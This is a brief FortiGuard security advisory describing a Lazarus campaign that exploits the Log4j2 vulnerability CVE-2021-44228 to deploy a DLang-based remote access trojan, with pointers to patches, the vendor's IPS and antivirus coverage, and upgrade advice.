Lazarus RAT Attack (CVE-2021-44228)

Fortiguard Security Advisory

What is the Attack?
A new attack campaign led by the Lazarus threat actor group is seen employing new DLang-based Remote Access Trojan (RAT) malware. The attack attempts to exploit the Apache Log4j2 vulnerability (CVE-2021-44228) as initial access. Once compromised, it eventually creates a command and control (C2) channel.

What is the Vendor Solution?

Apache has released relevant updates in 2021 on CISA has provided guidance on mitigating the vulnerability at

What FortiGuard Coverage is available?

FortiGuard Labs has an IPS signature “Apache.Log4j.Error.Log.Remote.Code.Execution” (with default action is set to “block”) in place for CVE-2021-44228 and has released Antivirus signatures for the RAT malware related to the Lazarus campaign.

FortiGuard Labs recommends companies to scan their environment, find the versions of open-source vulnerable libraries in use, and develop an upgrade plan for them and always follow best practices.